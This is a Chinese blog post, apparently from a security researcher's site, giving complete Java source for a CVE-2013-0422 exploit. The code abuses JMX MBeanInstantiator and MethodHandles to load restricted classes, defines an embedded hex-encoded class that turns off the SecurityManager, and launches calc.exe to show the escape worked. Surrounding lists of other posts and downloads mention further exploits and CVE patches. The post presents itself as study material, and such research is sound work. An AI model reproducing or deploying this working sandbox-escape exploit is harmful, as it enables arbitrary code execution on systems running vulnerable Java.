- 浏览: 632021 次
- 性别:
- 来自: 西安
文章分类
最新评论
-
d1438138:
[img][/img]
google api 的一些神奇使用 -
waykingeye:
[i][b][u]引用[list]
[*][img][url] ...
No result defined for action and result input -
tss0823:
...
No result defined for action and result input -
yahier:
有什么办法能够捕捉,然后给出自定义的提示呢
No result defined for action and result input -
chen_lian:
恩恩 按照上面的代码测试一下觉得很对
java创建目录
0x01 这个是这两天爆出来的,我构建了一个本地测试代码,主要用来研究,测试方法,直接跑就可以看输出就可以看懂了,具体分析代码见后文
0x02 package test;
/* Java 0day 1.7.0_10 decrypted source Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0 From Russia with love. */ import java.io.IOException; import java.lang.invoke.MethodHandle; import java.lang.invoke.MethodHandles; import java.lang.invoke.MethodType; import java.security.Permission; import java.security.PermissionCollection; import java.security.Policy; import java.security.ProtectionDomain; import java.util.Enumeration; import com.sun.jmx.mbeanserver.JmxMBeanServer; import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder; import com.sun.jmx.mbeanserver.MBeanInstantiator; public class Test { void checkPermission() { ProtectionDomain domain = this.getClass().getProtectionDomain(); PermissionCollection pcoll = Policy.getPolicy().getPermissions(domain); Enumeration e = pcoll.elements(); int i = 0; for (; e.hasMoreElements();) { Permission p = (Permission) e.nextElement(); System.out.println(i + ": " + p); i++; } System.out.println("the num:" + i); } void alert() throws IOException { try { Runtime.getRuntime().exec("calc.exe"); } catch (IOException e) { // TODO Auto-generated catch block e.printStackTrace(); throw e; } } public static void main(String args[]) { try { System.out.println("1.SecurityManager 开启前测试"); Test test = new Test(); // test.checkPermission(); try { test.alert(); System.out.println("2.成功执行 exec"); } catch (SecurityException e) { System.out.println("2.you have no permission to exec"); } System.out.println("3.开启SecurityManager"); System.setSecurityManager(new SecurityManager()); System.out.println("4.SecurityManager 开启后测试"); try { test.alert(); System.out.println("5.成功执行 exec"); } catch (SecurityException e) { System.out.println("5.you have no permission to exec"); } byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff); JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder(); JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer) localJmxMBeanServerBuilder .newMBeanServer("", null, null); MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer .getMBeanInstantiator(); ClassLoader a = null; Class localClass1 = localMBeanInstantiator.findClass( "sun.org.mozilla.javascript.internal.Context", a); Class localClass2 = localMBeanInstantiator.findClass( "sun.org.mozilla.javascript.internal.GeneratedClassLoader", a); MethodHandles.Lookup localLookup = MethodHandles.publicLookup(); MethodType localMethodType1 = MethodType.methodType( MethodHandle.class, Class.class, new Class[] { MethodType.class }); MethodHandle localMethodHandle1 = localLookup.findVirtual( MethodHandles.Lookup.class, "findConstructor", localMethodType1); MethodType localMethodType2 = MethodType.methodType(Void.TYPE); MethodHandle localMethodHandle2 = (MethodHandle) localMethodHandle1 .invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 }); Object localObject1 = localMethodHandle2 .invokeWithArguments(new Object[0]); MethodType localMethodType3 = MethodType.methodType( MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class }); MethodHandle localMethodHandle3 = localLookup .findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3); MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class); MethodHandle localMethodHandle4; localMethodHandle4 = (MethodHandle) localMethodHandle3 .invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 }); Object localObject2 = localMethodHandle4 .invokeWithArguments(new Object[] { localObject1, null }); MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class }); MethodHandle localMethodHandle5 = (MethodHandle) localMethodHandle3 .invokeWithArguments(new Object[] { localLookup, localClass2, "defineClass", localMethodType5 }); Class localClass3 = (Class) localMethodHandle5 .invokeWithArguments(new Object[] { localObject2, null, arrayOfByte }); localClass3.newInstance(); System.out.println("6.CVE-2013-0422执行后"); try { test.alert(); System.out.println("7.成功执行 exec"); } catch (SecurityException e) { System.out.println("7.you have no permission to exec"); } } catch (Throwable e1) { // TODO Auto-generated catch block e1.printStackTrace(); } } public static byte[] hex2Byte(String paramString) { byte[] arrayOfByte = new byte[paramString.length() / 2]; for (int i = 0; i < arrayOfByte.length; i++) { arrayOfByte[i] = (byte) Integer.parseInt( paramString.substring(2 * i, 2 * i + 2), 16); } return arrayOfByte; } public static String ByteArrayWithSecOff = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F07002001" + "00063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C6501" + "00124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F4578" + "63657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F" + "07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F757263" + "6546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F" + "457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A65637401000142" + "0100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E41637469" + "6F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F" + "50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C6567656445" + "7863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176" + "612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A" + "6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000" + "020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100" + "040009000C00030003000B000000120004000000080004000B0009000C000D000D000C0000001600" + "02000D0000000D000E00010000000E000F001000000011000000100002FF000C0001070012000107" + "0013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B0000000" + "02000B0000000A00020000001000040011000C0000000C00010000000C000F001000000001001600" + "0000020017"; }
发表评论
-
metasploit 图形化界面和自动化exploit脚本
2013-10-21 16:25 77740x01 最新版的metasploit没了图形化界面, ... -
APKTool签名的一个问题
2013-10-14 21:19 25240x01 昨天写了反编译,今天就写下签名的问题 0 ... -
APKTool打包的一个小问题
2013-10-13 20:23 248350x01,又开始写blog了,好久没有网络了,最近终于可以开 ... -
struts2远程执行漏洞学习(四)
2013-05-23 00:12 23600x01 最近又有了一个新的struts2漏洞,http:/ ... -
纯转一篇关于方法句柄的,对理解很多java poc帮助很大
2013-04-19 15:16 4356http://book.2cto.com/20130 ... -
CVE-2013-1493 学习
2013-03-25 16:06 30240x01 这个又是一个java CVE,效果前几个一样, ... -
myeclipse崩溃多处理的一个小窍门
2013-01-15 20:23 31930x01 如果大家用了myeclipse10以上版本,忽然间 ... -
CVE-2013-0422 分析2
2013-01-11 23:47 35290x01 http://wcf1987.iteye.c ... -
CVE 2012 0507 分析
2012-12-17 16:00 35730x01 https://github.com/wche ... -
android 无权限 伪造短信
2012-11-06 09:15 35840x01 这个有是大名鼎鼎的蒋教授发现的,原理简单,有点意思 ... -
A new way to hack android app info
2012-11-06 01:04 1670最近新研究了一种android攻击手段,blog发到团队那里的 ... -
一次被黑追凶(未完待续)
2012-10-15 19:52 25180x01,某天师妹告诉我们某台服务器疑似被人干掉了,我果断远程 ... -
<找工作 十一>生产者消费者 组赛队列
2012-09-25 17:39 1534用阻塞队列实现 import java.util.co ... -
<找工作 十>生产者 消费者模型
2012-09-25 16:54 1164今天被问了个这个问 ... -
<找工作 九> 字符串全排列问题
2012-09-23 22:01 1389public class StringTest { ... -
<找工作 七>leetcode Add Two Numbers
2012-09-13 22:24 3148Add Two Numbers 链表相加 p ... -
<找工作 六>leetcode Median of Two Sorted Arrays
2012-09-13 21:25 3253http://www.leetcode.com/onlinej ... -
python 反编译 pyc 一些心得
2012-09-06 10:59 538470x01 , 现在用python的人也多了起来,代码安全始终是 ... -
关于web渗透中得一些记录
2012-08-24 23:31 36221. 当得到linux root shell时 ... -
mail xss
2012-08-11 21:57 17171 最近迷上了xss,感觉各种飘逸,特别是http://www ...
相关推荐
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835, CVE-2011-0838, CVE-2011-0848, CVE-2011-0870, CVE-2011-0876, CVE-2011-0879, CVE-2011-0880, CVE-2011-2230, CVE-2011-2231, CVE-2011...
利用CVE-2013-2251漏洞获取服务器的webshell,从而黑入服务器
14. CVE-2014-3566、CVE-2015-0449、CVE-2014-6569、CVE-2013-2186、CVE-2017-3248、CVE-2011-1411、CVE-2011-5035:这些早期的CVE编号显示了WebLogic历史上存在的安全问题,需要定期评估系统的安全状态,并进行必要...
CVE-2013-6117 $ ./CVE-2013-6117 -hOptions: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads ...
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
Androidroot源码利用CVE-2013-6282漏洞.zip,太多无法一一验证是否可用,程序如果跑不起来需要自调,部分代码功能进行参考学习。
自己总结出来的一个脚本,虽然是利用,但是工具是可以用。系统漏洞脚本
CVE-2013-6282是一个漏洞编号,该漏洞属于Linux内核级别的漏洞,在android 2.x至4.3之前的版本中同样存在, 可以用于系统提权,获得root权限,属于Linux系统API缺陷。 利用该漏洞,开发Android root程序。
weblogic10.36 CVE-2018-2893补丁文件 最新补丁文件,修复 WebLogic(CVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞...
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux ...
1.上传并解压:Centos7-openssh补丁包(最新fix CVE-2021-41617 #2008884).zip 2.到服务器对应的解压目录 执行命令安装 : rpm -Fvh openssh-* 3.安装完成后执行命令查看修复情况: rpm -qa openssh --changelog | ...
标题 "cve-2019-2725修复相关的补丁p29694149_10360190115_Generic.zip" 指涉的是一个针对CVE-2019-2725漏洞的安全更新。CVE-2019-2725,全称“Common Vulnerabilities and Exposures”,是2019年发现的一个特定安全...
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实现,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...
Oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip 是一个针对Oracle数据库系统的重要安全更新。这个补丁主要解决了一个在Oracle 11.2.0.1版本中的严重安全漏洞,该漏洞被标记为CVE-2012-1675...
标题 "cve-2019-0708-poc-exp.zip" 指涉的是一个与CVE-2019-0708漏洞相关的Proof-of-Concept(PoC)利用工具的压缩包。这个漏洞,通常被称为“BlueKeep”,是一个严重且广泛影响微软远程桌面服务的安全漏洞。描述中...